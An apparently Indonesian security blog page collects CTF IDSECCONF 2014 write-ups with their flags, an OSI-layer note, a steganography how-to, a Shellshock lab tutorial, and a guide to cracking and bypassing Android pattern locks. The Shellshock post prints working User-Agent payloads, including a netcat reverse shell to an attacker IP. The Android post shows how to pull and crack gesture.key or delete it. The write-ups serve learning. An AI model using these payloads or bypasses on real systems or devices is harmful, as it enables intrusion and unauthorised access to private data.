Writeup CTF IDSECCONF 2014 ONLINE ( Easy Reverse )

1. Peserta diberi soal exe dimana file exe ini dari microsoft.NET
2. Disini saya menggunakan iLSpy untuk decompile program, berikut hasil decompile program menggunakan iLSpy

using System;
using System.ComponentModel;
using System.Drawing;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace WindowsFormsApplication1
{
public class Form1 : Form
{
private IContainer components = null;
private Button button1;
private TextBox textBox1;
private string Oye = "abcdefghijklmnopqrstuvwxyz0123456789";
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
{
this.components.Dispose();
}
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.button1 = new Button();
this.textBox1 = new TextBox();
base.SuspendLayout();
this.button1.Location = new Point(110, 96);
this.button1.Name = "button1";
this.button1.Size = new Size(75, 47);
this.button1.TabIndex = 0;
this.button1.Text = "Check Beibe";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
this.textBox1.Location = new Point(80, 40);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new Size(157, 20);
this.textBox1.TabIndex = 1;
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(320, 174);
base.Controls.Add(this.textBox1);
base.Controls.Add(this.button1);
base.Name = "Form1";
this.Text = "IDSECCONF 2014 - EASY REVERSE";
base.ResumeLayout(false);
base.PerformLayout();
}
public Form1()
{
this.InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
string text = this.Oye.Substring(6, 1); // g
text += this.Oye.Substring(0, 1); // ga
text += this.Oye.Substring(13, 1); // gan 
text += this.Oye.Substring(19, 1); // gant
text += this.Oye.Substring(4, 1); // gante
text += text.Substring(2, 1); // ganten
text += text.Substring(0, 1); // ganteng
text += this.Oye.Substring(26, 5); // ganteng01234
text = text.Remove(10, 1); // ganteng0124
text = text.Replace(text.Substring(9, 1), text.Substring(7, 1)); // ganteng0104
text = text.Replace(text.Substring(7, 1), this.Oye.Substring(28, 1)); // ganteng2104
text = text.Replace(text.Substring(8, 2), this.Oye.Substring(26, 2)); // ganteng2014
MD5 mD = MD5.Create();
byte[] array = mD.ComputeHash(Encoding.UTF8.GetBytes(text));
StringBuilder stringBuilder = new StringBuilder();
for (int i = 0; i < array.Length; i++)
{
stringBuilder.Append(array[i].ToString("x2"));
}
if (this.textBox1.Text == text) // ganteng2014
{
MessageBox.Show(stringBuilder.ToString(), "Flag"); // cetak flag
}
else
{
MessageBox.Show("Dikocok lagi bro");
}
}
}
}

3. Perhatikan kode diatas yang saya tebalkan, password nya adalah ganteng2014


FLAG : 9bd03cfdfe10124755e2a051288c6dda

Related Posts:

Fungsi dan Contoh Setiap Layer pada OSI Layer

Application
Tugas utamanya untuk memberikan pelayanan ke user berupa aplikasi untuk komunikasi antar program di tiap mesin pengguna jaringan.
Contoh : Telnet, HTTP, FTP, SSH, SMTP, dll.

Presentation
Untuk mendefinisikan format data, sehingga user tidak menyelesaikan sendiri suatu masalah yang timbul, misalnya encoding data.
Contoh : ASCII, JPEG, MPEG, GIF, dll.

Session
Untuk mendefinisikan bagaimana memulai, mengontrol dan mengakhiri suatu percakapan, seperti login.
Contoh : SQL, SCP

Transport
Menerima data dari session kemudian melakukan multiplexing terhadap data yang datang, mengurutkan data yang datang apabila datangnya tidak berurutan.
Contoh : TCP, UDP

Network
Untuk mengendalikan sistem subneting dengan melewatkan paket data dari node satu ke node lainnya, melakukan pengalamantan, mendefinisikan jalur ( routing ).
Contoh : IP, ARP, RIP

Data Link
Untuk mengatur bentuk topologi, error notification, flow control, mengatur pengiriman data dari interface yang berbeda.
Contoh : IEEE 802.2/802.3, PPP,

Physical
Untuk mengatur interface fisik ( LAN Card, WLAN Card)
Contoh : Ethernet, RJ45

Related Posts:

Writeup CTF IDSECCONF 2014 ONLINE ( Easy Web Hacking )

1. Mencoba memasukan password dengan kata password ,mengingat
kolom user telah diisi default dengan nama user tapi akses ditolak.

2. Pada halaman pertama saya mendaptkan clue : array.
Mencoba mengganti name passwd menjadi passwd[]

3. Mencoba untuk login ,dan tidak mendapatkan flag. Tetapi mendapatkan clue yang lain yaitu gunakan user yang lain.

4. Mencoba melakukan inscpect element lagi dengan mencoba
mengganti user dengan admin.



5. Melakukan login dan saya mendapatkan flag: mantaplah_br0_l4njutk4n

Related Posts:

Writeup CTF IDSECCONF 2014 ONLINE ( Medium Reverse )

Pesan : WFGNEOFGEDQGE
Hint : ABCD
Encoder : ELFupdate
1. Mencoba menjalankan file ELFupdate, menjalankannya yaitu ./ELFupdate message key

2. Mencoba memasukan pesan dan hint

3. Ternyata menghasilan Encode : WGIQEPHJEESJE
4. Menganalisa encode dari pesan yang diinput menggunakan key
ABCD

W ke W => Tidak ada pergeseran huruf
F ke G => Terjadi pergersan huruf 1x
G ke I => Terjadi pergeseran huruf 2x
N ke Q => Terjadi pergeseran huruf 3x
E ke E => Tidak ada pergeseran huruf
O ke P => Terjadi pergersan huruf 1x
F ke H => Terjadi pergersan huruf 2x
G ke J => Terjadi pergersan huruf 3x
E ke E => Tidak ada pergeseran huruf
D ke E => Terjadi pergersan huruf 1x
Q ke S => Terjadi pergersan huruf 2x
G ke J => Terjadi pergersan huruf 3x
E ke E => Tidak ada pergeseran huruf

5. Mencoba melakukan decode pesan WFGNEOFGEDQGE
W digeser 0 kali kebelakang menjadi W
F digeser 1 kali kebelakang menjadi E
G digeser 2 kali kebelakang menjadi E
N digeser 3 kali kebelakang menjadi K
E digeser 0 kali kebelakang menjadi E
O digeser 1 kali kebelakang menjadi N
F digeser 2 kali kebelakang mejadi D
G digeser 3 kali kebelakang menjadi D
E digeser 0 kali kebelakang menjadi E
D digeser 1 kali kebelakang menjadi C
Q digeser 2 kali kebelakang menjadi O
G digeser 3 kali kebelakang menjadi D
E digeser 0 kali kebelakang menjadi E

6. Saya mendapatkan flag : WEEKENDDECODE

Related Posts:

Writeup CTF IDSECCONF 2014 ONLINE ( Medium Forensic )

Soal : Seorang Attacker berasal dari Afrika.

1. Mengecek dir per dir, dan ketika saya mengecek pada dir
home ,terdapat folder clue. Pada folder clue terdapat suatu file
dimana didalamnya mengandung informasi yaitu periksa log

2. Saatnya pergi ke folder log, dimana yang saya tuju adalah log apache
/ web server dimana disana banyak terjadi serangan. Melakukan
filtering untuk mendapatkan log IP pengunjung ataupun attacker
Afrika.

3. Saya mendapatkan informasi dari google kalau benua afrika
menggunakan block ip 41.xx.xx.xx.
Bisa dilihat disini www.nirsoft.net/countryip/za.html

4. Melakukan filtering terhadap ip afrika dimana disini saya menggunakan fitur grep untuk memfilter IP 41.

5. Saya mendapatkan IP 41.74.96.5, untuk memastikan apakah itu
benar IP dari Afrika ,saya melakukan trace IP.

6. Ya ternyata benar IP itu berasal dari Afrika Selatan, lalu dimana
flagnya ?

7. Saya mencoba melakukan filtering access.log dan memanfaatkan
fitur grep untuk memfilter IP 41.74.96.5 melakukan apa saja pada
web server apache.

8. Dan saya mendapatkan Flagnya : mencar1_kamu_br0

Related Posts:

Steganography dengan Command Line Linux

1. Menyiapkan file gambar yang akan disisipi pesan.

2. Membuat tulisan pesan yang ingin disisipkan.
3. Melakukan compress menggunakan zip.

4. Menyembunyiakn pesan txt didalam foto. Dan lihat lah size file image.jpg original
dengan image-stego.jpg ,ukurannya berbeda. Ya karena didalam file image-stego,jpg
terdapat file txt.

5. Mengecek apakah ada file txt yang ada pada gambar dengan strings.

6. Melakukan ekstract dengan unzip untuk membuktikan bahwa di dalam gambar
image-stego.jpg terdapat suatu file .txt .



Related Posts:

Exploitasi Shellshock Vulnerability With Kali Linux

1. Untuk melakukan pengujian shellshock secara legal, download ISO dari Pentesterlab dimana di ISO tersebut memiliki kerentanan yaitu Shellshock
2. Setelah didownload, buka menggunakan VMware, kemudian setting IP dan Netmasknya.
Contoh : ifconfig eth0 172.16.208.20 netmask 255.255.255.0

3. Setelah itu ,akses IP tadi dari sisi client / Attacker.

4. Mengakses cgi-bin ,dimana shellshock bisa dieksploitasi dari sisi webserver apabila web tersebut memiliki cgi-bin yang aktif. Untuk dork cgi-bin bisa gunakanan ini :

5. Untuk menguji apakah target vulner terhadap shellsock, saya mencoba dengan menerapkan firewall log icmp ,agar ketika saya melakukan injeksi dengan perintah ping dapat terlog oleh system saya.

6. Buka Live Http header ( Ads On Mozilla Firefox )

7. Pada bagian User-Agent saya ganti dengan injeksi shellshock, berikut injeksinya
() { :;}; /bin/bash -c “ping 172.16.208.2” IP 172.16.208.2 adalah IP Laptop saya. Kemudian Klick Replay pada Live HTTP Headernya.

8. Melakukan cek log apakah ada protocol icmp ( ping ) yang masuk , tail -f /var/log/messages

9. Saya mendapatkan log dimana SRC 172.16.208.20 dengan DST 172.16.208.2 berhubungan melalui protocol ICMP. Dengan begini, berarti injeksi tadi berhasil dan system target mempunyai vulner shellshock.
10. Mencoba melakukan BACK-CONNECT dengan NC untuk mendapatkan akses Shell.
11. Saya membuat listening terlebih dahulu menggunakan NC.

12. Kemudian kembali ke Live HTTP Header dan masukan injeksi ini :
() { :;}; /bin/bash -c “nc 172.16.208.2 4444 –e /bin/bash -i”
Kemudian klick replay.

13. Dan ,saya mendapatkan akses shell lewat NC.

14. Untuk mendapatkan akses root, kita bisa melakukannya dengan local root exploit.

Related Posts:

Install ADB, Crack & Bypassing Android Pattern 3x3 With Kali Linux

Syarat :
1. Android harus dalam keadaan rooted.
2. ADB Debugging On.

Alat dan Bahan :
1. Android yang sudah dirooting
2. Adb sudah dienable. Apabila belum, pergi ke Settings – Developer Options – USB
debugging on.
3. Adb Tools download disini http://esausilva.com/misc/android/platform-toolslinux.
tar.gz
4. Dictionary download disini
http://www.android-forensics.com/tools/AndroidGestureSHA1.rar

Cara :
1. Download semua yang diperluhkan dan ekstrack.

2. Ketikan lsub ,dan cari device anda. Disini saya menggunakan Lenovo maka serial key
nya adalah 7641

3. Buat file 70-android.rules pada /etc/udev/rules.d/ dengan cara nano /etc/udev/rules.d/70-android.rules kemudian isikan ini
SUBSYSTEM=="usb",ATTRS(idVendor)=="7641",SYMLINK+="android_adb",MODE="0666" SUBSYSTEM=="USB",SYSFS=={idVendor}=="7641",mode="0666" SUBSYSTEM=="usb", ACTION=="add", SYSFS{idVendor}=="7641", SYSFS{idProduct}=="adde", MODE="0777" SUBSYSTEM=="usb", ACTION=="add", SYSFS{idVendor}=="7641", SYSFS{idProduct}=="0dde", MODE="0777"
Note : 7641 diganti dengan serial handphone anda masing-masing.


4. Simpan dan berikan chmod kemudian reboot linux.

5. Colokan android dengan linux dengan kabel USB ,kalau bisa yang original. Ketikan ./adb shell. Letak pattern key android ada pada /data/system/gesture.key.

6. Melakukan chmod pada gesture.key agar bisa untuk dipindah ke dir yang lain.

7. Memindahkan gesture.key kedalam sdcard.

8. Melakukan downloading gesture.key yang ada dalam sdcard dengan adb pull

9. Memindahkan gesture.key yang sudah didownload ke dalam dir yang berisi dictionary untuk proses cracking.

10. Melakukan proses cracking dengan dictionary dan bantuan program xxd

11. Didapat pattern dengan pola 25874 dan 576291843 , akan tetapi ketika saya coba dengan pola yang pertama , saya sudah bisa masuk ke homescreen. Jadi pattern yang tepat adalah dengan pola 25874.
12. Untuk pola patternnya seperti ini.

13. Apabila ingin masuk tanpa harus melakukan cracking pattern bisa saja, dengan cara melakukan remove gesture.key yang ada pada /data/system/ dan kemudian melakukan reboot.

14. Ketika android menyala anda akan dimintai pattern, cukup dengan cara melakukan random pattern anda sudah bisa masuk ke homescreen

Related Posts: